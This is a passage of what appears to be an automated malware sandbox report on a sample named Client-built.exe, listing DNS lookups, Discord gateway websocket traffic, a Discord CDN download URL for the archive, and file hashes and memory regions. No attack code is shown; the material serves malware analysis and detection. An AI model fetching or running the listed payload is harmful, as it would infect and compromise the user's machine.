                                    a96-17-179-83.deploy.static.akamaitechnologies.com
                                  • flag-us
                                    DNS
                                    83.179.17.96.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    83.179.17.96.in-addr.arpa
                                    IN PTR
                                  • flag-us
                                    DNS
                                    83.179.17.96.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    83.179.17.96.in-addr.arpa
                                    IN PTR
                                  • flag-us
                                    DNS
                                    83.179.17.96.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    83.179.17.96.in-addr.arpa
                                    IN PTR
                                  • flag-us
                                    GET
                                    https://gateway.discord.gg/?v=9&encording=json
                                    Client-built.exe
                                    Remote address:
                                    162.159.133.234:443
                                    Request
                                    GET /?v=9&encording=json HTTP/1.1
                                    Connection: Upgrade,Keep-Alive
                                    Upgrade: websocket
                                    Sec-WebSocket-Key: wPOTBHsUbIcgym5aheReGA==
                                    Sec-WebSocket-Version: 13
                                    Host: gateway.discord.gg
                                    Response
                                    HTTP/1.1 101 Switching Protocols
                                    Date: Mon, 25 Mar 2024 19:44:27 GMT
                                    Connection: upgrade
                                    sec-websocket-accept: zzze41oiyHdHNydu2fcNbHz1kSM=
                                    upgrade: websocket
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZEyuF209ST41sFmxHQu97cNQiQ9bbXN8aQ1DTGlL0roZz2%2BF3hUEenfw05S%2FC98S7HUOPqzcT5mWOTnnLDh41F5UPDQkciu2hivXmUBl0yB7QKmKMxntn5TZWkFyaQRSP1eGmw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                    X-Content-Type-Options: nosniff
                                    Server: cloudflare
                                    CF-RAY: 86a165498b7c7719-LHR
                                  • flag-us
                                    DNS
                                    64.179.17.96.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    64.179.17.96.in-addr.arpa
                                    IN PTR
                                    Response
                                    64.179.17.96.in-addr.arpa
                                    IN PTR
                                    a96-17-179-64.deploy.static.akamaitechnologies.com
                                  • flag-us
                                    DNS
                                    68.179.17.96.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    68.179.17.96.in-addr.arpa
                                    IN PTR
                                    Response
                                    68.179.17.96.in-addr.arpa
                                    IN PTR
                                    a96-17-179-68.deploy.static.akamaitechnologies.com
                                  • flag-us
                                    DNS
                                    11.227.111.52.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    11.227.111.52.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    tse1.mm.bing.net
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    tse1.mm.bing.net
                                    IN A
                                    Response
                                    tse1.mm.bing.net
                                    IN CNAME
                                    mm-mm.bing.net.trafficmanager.net
                                    mm-mm.bing.net.trafficmanager.net
                                    IN CNAME
                                    dual-a-0001.a-msedge.net
                                    dual-a-0001.a-msedge.net
                                    IN A
                                    204.79.197.200
                                    dual-a-0001.a-msedge.net
                                    IN A
                                    13.107.21.200
                                  • flag-us
                                    DNS
                                    tse1.mm.bing.net
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    tse1.mm.bing.net
                                    IN A
                                  • flag-us
                                    GET
                                    https://tse1.mm.bing.net/th?id=OADD2.10239340418600_11EQ8QDR6IPB0F4AN&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
                                    Remote address:
                                    204.79.197.200:443
                                    Request
                                    GET /th?id=OADD2.10239340418600_11EQ8QDR6IPB0F4AN&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
                                    host: tse1.mm.bing.net
                                    accept: */*
                                    accept-encoding: gzip, deflate, br
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                                    Response
                                    HTTP/2.0 200
                                    cache-control: public, max-age=2592000
                                    content-length: 633835
                                    content-type: image/jpeg
                                    x-cache: TCP_HIT
                                    access-control-allow-origin: *
                                    access-control-allow-headers: *
                                    access-control-allow-methods: GET, POST, OPTIONS
                                    timing-allow-origin: *
                                    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
                                    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                    x-msedge-ref: Ref A: 2D20AC793B1441D98B0DE781133C2A13 Ref B: LON04EDGE1209 Ref C: 2024-03-25T19:44:57Z
                                    date: Mon, 25 Mar 2024 19:44:57 GMT
                                  • flag-us
                                    GET
                                    https://tse1.mm.bing.net/th?id=OADD2.10239339388227_12445L34APGOUOAUP&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
                                    Remote address:
                                    204.79.197.200:443
                                    Request
                                    GET /th?id=OADD2.10239339388227_12445L34APGOUOAUP&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
                                    host: tse1.mm.bing.net
                                    accept: */*
                                    accept-encoding: gzip, deflate, br
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                                    Response
                                    HTTP/2.0 200
                                    cache-control: public, max-age=2592000
                                    content-length: 737521
                                    content-type: image/jpeg
                                    x-cache: TCP_HIT
                                    access-control-allow-origin: *
                                    access-control-allow-headers: *
                                    access-control-allow-methods: GET, POST, OPTIONS
                                    timing-allow-origin: *
                                    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
                                    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                    x-msedge-ref: Ref A: D472B17BEB9847A2B605DF2CBF509E74 Ref B: LON04EDGE1209 Ref C: 2024-03-25T19:44:57Z
                                    date: Mon, 25 Mar 2024 19:44:57 GMT
                                  • flag-us
                                    GET
                                    https://tse1.mm.bing.net/th?id=OADD2.10239339388226_1MEO3672GYCIY8OR6&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
                                    Remote address:
                                    204.79.197.200:443
                                    Request
                                    GET /th?id=OADD2.10239339388226_1MEO3672GYCIY8OR6&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
                                    host: tse1.mm.bing.net
                                    accept: */*
                                    accept-encoding: gzip, deflate, br
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                                    Response
                                    HTTP/2.0 200
                                    cache-control: public, max-age=2592000
                                    content-length: 707128
                                    content-type: image/jpeg
                                    x-cache: TCP_HIT
                                    access-control-allow-origin: *
                                    access-control-allow-headers: *
                                    access-control-allow-methods: GET, POST, OPTIONS
                                    timing-allow-origin: *
                                    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
                                    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                    x-msedge-ref: Ref A: B2A9CFB8876846B7A2BA058729ECB238 Ref B: LON04EDGE1209 Ref C: 2024-03-25T19:44:57Z
                                    date: Mon, 25 Mar 2024 19:44:57 GMT
                                  • flag-us
                                    GET
                                    https://tse1.mm.bing.net/th?id=OADD2.10239339388040_17NRQFHMSVZES5QDT&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
                                    Remote address:
                                    204.79.197.200:443
                                    Request
                                    GET /th?id=OADD2.10239339388040_17NRQFHMSVZES5QDT&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
                                    host: tse1.mm.bing.net
                                    accept: */*
                                    accept-encoding: gzip, deflate, br
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                                    Response
                                    HTTP/2.0 200
                                    cache-control: public, max-age=2592000
                                    content-length: 694302
                                    content-type: image/jpeg
                                    x-cache: TCP_MISS
                                    access-control-allow-origin: *
                                    access-control-allow-headers: *
                                    access-control-allow-methods: GET, POST, OPTIONS
                                    timing-allow-origin: *
                                    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
                                    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                    x-msedge-ref: Ref A: 12D8984537344D74AF44C9D585508C25 Ref B: LON04EDGE1209 Ref C: 2024-03-25T19:44:57Z
                                    date: Mon, 25 Mar 2024 19:44:57 GMT
                                  • flag-us
                                    GET
                                    https://tse1.mm.bing.net/th?id=OADD2.10239340418599_1G42Z13GRT0FB3ANC&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
                                    Remote address:
                                    204.79.197.200:443
                                    Request
                                    GET /th?id=OADD2.10239340418599_1G42Z13GRT0FB3ANC&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
                                    host: tse1.mm.bing.net
                                    accept: */*
                                    accept-encoding: gzip, deflate, br
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                                    Response
                                    HTTP/2.0 200
                                    cache-control: public, max-age=2592000
                                    content-length: 632525
                                    content-type: image/jpeg
                                    x-cache: TCP_HIT
                                    access-control-allow-origin: *
                                    access-control-allow-headers: *
                                    access-control-allow-methods: GET, POST, OPTIONS
                                    timing-allow-origin: *
                                    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
                                    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                    x-msedge-ref: Ref A: E50BD18756A84BC1B18F536D9FC56073 Ref B: LON04EDGE1209 Ref C: 2024-03-25T19:44:57Z
                                    date: Mon, 25 Mar 2024 19:44:57 GMT
                                  • flag-us
                                    GET
                                    https://tse1.mm.bing.net/th?id=OADD2.10239339388041_1G4A2C01B1PAFTOD1&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
                                    Remote address:
                                    204.79.197.200:443
                                    Request
                                    GET /th?id=OADD2.10239339388041_1G4A2C01B1PAFTOD1&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
                                    host: tse1.mm.bing.net
                                    accept: */*
                                    accept-encoding: gzip, deflate, br
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                                    Response
                                    HTTP/2.0 200
                                    cache-control: public, max-age=2592000
                                    content-length: 576636
                                    content-type: image/jpeg
                                    x-cache: TCP_MISS
                                    access-control-allow-origin: *
                                    access-control-allow-headers: *
                                    access-control-allow-methods: GET, POST, OPTIONS
                                    timing-allow-origin: *
                                    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
                                    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                    x-msedge-ref: Ref A: 09E5592EB4594634AA9E021D05B6D18F Ref B: LON04EDGE1209 Ref C: 2024-03-25T19:45:11Z
                                    date: Mon, 25 Mar 2024 19:45:10 GMT
                                  • flag-us
                                    DNS
                                    200.197.79.204.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    200.197.79.204.in-addr.arpa
                                    IN PTR
                                    Response
                                    200.197.79.204.in-addr.arpa
                                    IN PTR
                                    a-0001.a-msedge.net
                                  • 162.159.133.233:443
                                    cdn.discordapp.com
                                    tls, http2
                                    msedge.exe
                                    1.8kB
                                    1.1kB
                                    13
                                    8
                                  • 162.159.133.233:443
                                    https://cdn.discordapp.com/attachments/1221895306933833802/1221907200394530947/Client-built.rar?ex=661448c2&is=6601d3c2&hm=742e59191c8cd438d9f6924dfa9ee35cfa6c17abf842ad49793d52839320cfb4&
                                    tls, http2
                                    msedge.exe
                                    2.5kB
                                    32.6kB
                                    26
                                    35
                                    HTTP Request
                                    GET https://cdn.discordapp.com/attachments/1221895306933833802/1221907200394530947/Client-built.rar?ex=661448c2&is=6601d3c2&hm=742e59191c8cd438d9f6924dfa9ee35cfa6c17abf842ad49793d52839320cfb4&
                                    HTTP Response
                                    200
                                  • 162.159.133.234:443
                                    https://gateway.discord.gg/?v=9&encording=json
                                    tls, http
                                    Client-built.exe
                                    1.3kB
                                    4.2kB
                                    12
                                    12
                                    HTTP Request
                                    GET https://gateway.discord.gg/?v=9&encording=json
                                    HTTP Response
                                    101
                                  • 162.159.133.234:443
                                    https://gateway.discord.gg/?v=9&encording=json
                                    tls, http
                                    Client-built.exe
                                    1.4kB
                                    4.2kB
                                    13
                                    13
                                    HTTP Request
                                    GET https://gateway.discord.gg/?v=9&encording=json
                                    HTTP Response
                                    101
                                  • 204.79.197.200:443
                                    tse1.mm.bing.net
                                    tls, http2
                                    2.1kB
                                    8.2kB
                                    21
                                    15
                                  • 204.79.197.200:443
                                    https://tse1.mm.bing.net/th?id=OADD2.10239339388041_1G4A2C01B1PAFTOD1&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
                                    tls, http2
                                    147.2kB
                                    4.2MB
                                    3091
                                    3081
                                    HTTP Request
                                    GET https://tse1.mm.bing.net/th?id=OADD2.10239340418600_11EQ8QDR6IPB0F4AN&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
                                    HTTP Request
                                    GET https://tse1.mm.bing.net/th?id=OADD2.10239339388227_12445L34APGOUOAUP&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
                                    HTTP Request
                                    GET https://tse1.mm.bing.net/th?id=OADD2.10239339388226_1MEO3672GYCIY8OR6&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
                                    HTTP Request
                                    GET https://tse1.mm.bing.net/th?id=OADD2.10239339388040_17NRQFHMSVZES5QDT&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
                                    HTTP Request
                                    GET https://tse1.mm.bing.net/th?id=OADD2.10239340418599_1G42Z13GRT0FB3ANC&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
                                    HTTP Response
                                    200
                                    HTTP Response
                                    200
                                    HTTP Request
                                    GET https://tse1.mm.bing.net/th?id=OADD2.10239339388041_1G4A2C01B1PAFTOD1&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
                                    HTTP Response
                                    200
                                    HTTP Response
                                    200
                                    HTTP Response
                                    200
                                    HTTP Response
                                    200
                                  • 204.79.197.200:443
                                    tse1.mm.bing.net
                                    tls, http2
                                    2.1kB
                                    8.2kB
                                    21
                                    15
                                  • 204.79.197.200:443
                                    tse1.mm.bing.net
                                    tls, http2
                                    2.1kB
                                    8.2kB
                                    21
                                    15
                                  • 204.79.197.200:443
                                    tse1.mm.bing.net
                                    tls, http2
                                    2.1kB
                                    8.2kB
                                    21
                                    15
                                  • 8.8.8.8:53
                                    81.171.91.138.in-addr.arpa
                                    dns
                                    144 B
                                    146 B
                                    2
                                    1
                                    DNS Request
                                    81.171.91.138.in-addr.arpa
                                    DNS Request
                                    81.171.91.138.in-addr.arpa
                                  • 8.8.8.8:53
                                    cdn.discordapp.com
                                    dns
                                    msedge.exe
                                    64 B
                                    144 B
                                    1
                                    1
                                    DNS Request
                                    cdn.discordapp.com
                                    DNS Response
                                    162.159.133.233
                                    162.159.129.233
                                    162.159.130.233
                                    162.159.135.233
                                    162.159.134.233
                                  • 8.8.8.8:53
                                    0.159.190.20.in-addr.arpa
                                    dns
                                    71 B
                                    157 B
                                    1
                                    1
                                    DNS Request
                                    0.159.190.20.in-addr.arpa
                                  • 8.8.8.8:53
                                    61.179.17.96.in-addr.arpa
                                    dns
                                    71 B
                                    135 B
                                    1
                                    1
                                    DNS Request
                                    61.179.17.96.in-addr.arpa
                                  • 8.8.8.8:53
                                    233.133.159.162.in-addr.arpa
                                    dns
                                    74 B
                                    136 B
                                    1
                                    1
                                    DNS Request
                                    233.133.159.162.in-addr.arpa
                                  • 8.8.8.8:53
                                    13.86.106.20.in-addr.arpa
                                    dns
                                    71 B
                                    157 B
                                    1
                                    1
                                    DNS Request
                                    13.86.106.20.in-addr.arpa
                                  • 224.0.0.251:5353
                                    464 B
                                    7
                                  • 8.8.8.8:53
                                    9.228.82.20.in-addr.arpa
                                    dns
                                    70 B
                                    156 B
                                    1
                                    1
                                    DNS Request
                                    9.228.82.20.in-addr.arpa
                                  • 8.8.8.8:53
                                    43.58.199.20.in-addr.arpa
                                    dns
                                    71 B
                                    157 B
                                    1
                                    1
                                    DNS Request
                                    43.58.199.20.in-addr.arpa
                                  • 8.8.8.8:53
                                    41.110.16.96.in-addr.arpa
                                    dns
                                    71 B
                                    135 B
                                    1
                                    1
                                    DNS Request
                                    41.110.16.96.in-addr.arpa
                                  • 8.8.8.8:53
                                    50.23.12.20.in-addr.arpa
                                    dns
                                    70 B
                                    156 B
                                    1
                                    1

                                    DNS Request

                                    50.23.12.20.in-addr.arpa

                                  • 8.8.8.8:53
                                    gateway.discord.gg
                                    dns
                                    Client-built.exe
                                    128 B
                                    144 B
                                    2
                                    1

                                    DNS Request

                                    gateway.discord.gg

                                    DNS Request

                                    gateway.discord.gg

                                    DNS Response

                                    162.159.133.234
                                    162.159.136.234
                                    162.159.130.234
                                    162.159.135.234
                                    162.159.134.234

                                  • 8.8.8.8:53
                                    206.23.85.13.in-addr.arpa
                                    dns
                                    71 B
                                    145 B
                                    1
                                    1

                                    DNS Request

                                    206.23.85.13.in-addr.arpa

                                  • 8.8.8.8:53
                                    234.133.159.162.in-addr.arpa
                                    dns
                                    74 B
                                    136 B
                                    1
                                    1

                                    DNS Request

                                    234.133.159.162.in-addr.arpa

                                  • 8.8.8.8:53
                                    195.177.78.104.in-addr.arpa
                                    dns
                                    73 B
                                    139 B
                                    1
                                    1

                                    DNS Request

                                    195.177.78.104.in-addr.arpa

                                  • 8.8.8.8:53
                                    119.110.54.20.in-addr.arpa
                                    dns
                                    72 B
                                    158 B
                                    1
                                    1

                                    DNS Request

                                    119.110.54.20.in-addr.arpa

                                  • 8.8.8.8:53
                                    140.71.91.104.in-addr.arpa
                                    dns
                                    72 B
                                    137 B
                                    1
                                    1

                                    DNS Request

                                    140.71.91.104.in-addr.arpa

                                  • 8.8.8.8:53
                                    55.179.17.96.in-addr.arpa
                                    dns
                                    71 B
                                    135 B
                                    1
                                    1

                                    DNS Request

                                    55.179.17.96.in-addr.arpa

                                  • 8.8.8.8:53
                                    72.135.221.88.in-addr.arpa
                                    dns
                                    72 B
                                    137 B
                                    1
                                    1

                                    DNS Request

                                    72.135.221.88.in-addr.arpa

                                  • 8.8.8.8:53
                                    45.179.17.96.in-addr.arpa
                                    dns
                                    71 B
                                    135 B
                                    1
                                    1

                                    DNS Request

                                    45.179.17.96.in-addr.arpa

                                  • 8.8.8.8:53
                                    83.179.17.96.in-addr.arpa
                                    dns
                                    284 B
                                    135 B
                                    4
                                    1

                                    DNS Request

                                    83.179.17.96.in-addr.arpa

                                    DNS Request

                                    83.179.17.96.in-addr.arpa

                                    DNS Request

                                    83.179.17.96.in-addr.arpa

                                    DNS Request

                                    83.179.17.96.in-addr.arpa

                                  • 8.8.8.8:53
                                    64.179.17.96.in-addr.arpa
                                    dns
                                    71 B
                                    135 B
                                    1
                                    1

                                    DNS Request

                                    64.179.17.96.in-addr.arpa

                                  • 8.8.8.8:53
                                    68.179.17.96.in-addr.arpa
                                    dns
                                    71 B
                                    135 B
                                    1
                                    1

                                    DNS Request

                                    68.179.17.96.in-addr.arpa

                                  • 8.8.8.8:53
                                    11.227.111.52.in-addr.arpa
                                    dns
                                    72 B
                                    158 B
                                    1
                                    1

                                    DNS Request

                                    11.227.111.52.in-addr.arpa

                                  • 8.8.8.8:53
                                    tse1.mm.bing.net
                                    dns
                                    124 B
                                    173 B
                                    2
                                    1

                                    DNS Request

                                    tse1.mm.bing.net

                                    DNS Request

                                    tse1.mm.bing.net

                                    DNS Response

                                    204.79.197.200
                                    13.107.21.200

                                  • 8.8.8.8:53
                                    200.197.79.204.in-addr.arpa
                                    dns
                                    73 B
                                    106 B
                                    1
                                    1

                                    DNS Request

                                    200.197.79.204.in-addr.arpa

                                  MITRE ATT&CK Enterprise v15

                                  Downloads

                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                    Filesize

                                    152B

                                    MD5

                                    47b2c6613360b818825d076d14c051f7

                                    SHA1

                                    7df7304568313a06540f490bf3305cb89bc03e5c

                                    SHA256

                                    47a22bea2e7d0154c59bf5d8790ec68274eb05e9fa6cf0eab0d648121f1a02ac

                                    SHA512

                                    08d2366fc1ce87dbe96b9bf997e4c59c9206fcfea47c1f17b01e79aeb0580f25cac5c7349bb453a50775b2743053446653f4129f835f81f4a8547ca392557aac

                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                    Filesize

                                    152B

                                    MD5

                                    e0811105475d528ab174dfdb69f935f3

                                    SHA1

                                    dd9689f0f70a07b4e6fb29607e42d2d5faf1f516

                                    SHA256

                                    c91388c87878a9e2c530c6096dbdd993b0a26fefe8ad797e0133547225032d6c

                                    SHA512

                                    8374a721ea3ff3a1ea70d8a074e5c193dbba27ba7e301f19cea89d648b2378c376e48310c33fe81078cd40b1863daec935e8ac22e8e3878dc3a5bb529d028852

                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                    Filesize

                                    186B

                                    MD5

                                    094ab275342c45551894b7940ae9ad0d

                                    SHA1

                                    2e7ce26fe2eb9be641ae929d0c9cc0dfa26c018e

                                    SHA256

                                    ef1739b833a1048ee1bd55dcbac5b1397396faca1ad771f4d6c2fe58899495a3

                                    SHA512

                                    19d0c688dc1121569247111e45de732b2ab86c71aecdde34b157cfd1b25c53473ed3ade49a97f8cb2ddc4711be78fa26c9330887094e031e9a71bb5c29080b0d

                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                    Filesize

                                    6KB

                                    MD5

                                    3e730433dacaa0bcad4588e747eee1f9

                                    SHA1

                                    6f1b73d7b762c3a7703e4b827672f0f7abbac282

                                    SHA256

                                    776af7e1b54eaf2afafb78bb2d643cdb26d41e4250c5fd7e87e5d6ccfa271ac8

                                    SHA512

                                    3a13bb56cbccc1e54b6b32ffa5dbc03b319019ec5e90f3b35f42949d430b08ef45d13a65fcc15e85788bc78d3f3140405ce3f83184248063dbf52164cc32916d

                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                    Filesize

                                    6KB

                                    MD5

                                    9d5ecabf3dbbdc3b126534c2381f8355

                                    SHA1

                                    0411a211ce4692fafe58a06099158681a760b2ab

                                    SHA256

                                    aa25a7ef9218857e667a7731b051e21ba509cce567b50016ce0054cbd8e974f0

                                    SHA512

                                    5473ad21d6bb240299ac6c238d41f7851e43ac3aa3c23182a94fcf4df7c4da80193d492b0075458647710e4c643448878716663c780ead7b16c62abf8cb8c97a

                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                    Filesize

                                    16B

                                    MD5

                                    6752a1d65b201c13b62ea44016eb221f

                                    SHA1

                                    58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                    SHA256

                                    0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                    SHA512

                                    9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                    Filesize

                                    11KB

                                    MD5

                                    c7a446daf8cb3b12bbe09c78040e7c2f

                                    SHA1

                                    bcc59a8e5a21c1242e6c059a76838dd6699fcc1f

                                    SHA256

                                    6954486d6573bb32dbc2b6440e0d9f2460b3ebb54805fc6b2543ede85624cc29

                                    SHA512

                                    7bd890d4f07fb8a430f0a8e9c2a5ecbfd9a8671493892c872a7ff38254caff8bf264a4ab3afff6e955cec56ab7d877096802c642a9385f2059c14ca902ddb1b0

                                  • C:\Users\Admin\Downloads\Client-built.rar

                                    Filesize

                                    26KB

                                    MD5

                                    3d78b5ab445d0602ff0c4b47582d91c5

                                    SHA1

                                    243402f40286e3146271e7374715f645c0ee5997

                                    SHA256

                                    7a02bf428d0d07382a07d436fb38ee07411c8e18336e9e5a1c256d50f47360a7

                                    SHA512

                                    27c29e38ffad5ce94ea4a704637db3534c0aee1f5db8f43bba090d270c92b8e34dd11a2396d65e3d58b11820bebed8d590e876f740ea841f04c81392973fce57

                                  • C:\Users\Admin\Downloads\Client-built\Client-built.exe

                                    Filesize

                                    78KB

                                    MD5

                                    ba830918448347eda9570448c7551140

                                    SHA1

                                    585fb1eb9f0969f11f463888c383dc962f50cbbd

                                    SHA256

                                    71ef2f19d4ebb21b8d249b180c8fd7df66f21eb5752c143de3927b42a31a9a3a

                                    SHA512

                                    dfaf14f9ee95344d85f4785b08b9b1d77a5564c878c5ca990f14ffc8cc2c3974a7ddc77be6916e564d4cee6cc4f3a7d868b06f3ee39427b1b97108d240b56d9a

                                  • memory/3360-135-0x00000242C26D0000-0x00000242C26E0000-memory.dmp

                                    Filesize

                                    64KB

                                  • memory/3360-134-0x00007FFA87790000-0x00007FFA88251000-memory.dmp

                                    Filesize

                                    10.8MB

                                  • memory/3360-133-0x00000242C26D0000-0x00000242C26E0000-memory.dmp

                                    Filesize

                                    64KB

                                  • memory/3360-132-0x00007FFA87790000-0x00007FFA88251000-memory.dmp

                                    Filesize

                                    10.8MB

                                  • memory/5796-66-0x00007FFA87720000-0x00007FFA881E1000-memory.dmp

                                    Filesize

                                    10.8MB

                                  • memory/5796-67-0x00000120D0370000-0x00000120D0380000-memory.dmp

                                    Filesize

                                    64KB

                                  • memory/5796-68-0x00000120E9F40000-0x00000120EA468000-memory.dmp

                                    Filesize

                                    5.2MB

                                  • memory/5796-65-0x00000120E8AC0000-0x00000120E8C82000-memory.dmp

                                    Filesize

                                    1.8MB

                                  • memory/5796-93-0x00007FFA87720000-0x00007FFA881E1000-memory.dmp

                                    Filesize

                                    10.8MB

                                  • memory/5796-64-0x00000120CE400000-0x00000120CE418000-memory.dmp

                                    Filesize

                                    96KB

                                  • memory/5796-107-0x00007FFA87720000-0x00007FFA881E1000-memory.dmp

                                    Filesize

                                    10.8MB

                                  • memory/5972-80-0x00000231D21B0000-0x00000231D21B1000-memory.dmp

                                    Filesize

                                    4KB

                                  • memory/5972-91-0x00000231D21B0000-0x00000231D21B1000-memory.dmp

                                    Filesize

                                    4KB

                                  • memory/5972-92-0x00000231D21B0000-0x00000231D21B1000-memory.dmp

                                    Filesize

                                    4KB

                                  • memory/5972-90-0x00000231D21B0000-0x00000231D21B1000-memory.dmp

                                    Filesize

                                    4KB

                                  • memory/5972-89-0x00000231D21B0000-0x00000231D21B1000-memory.dmp

                                    Filesize

                                    4KB

                                  • memory/5972-88-0x00000231D21B0000-0x00000231D21B1000-memory.dmp

                                    Filesize

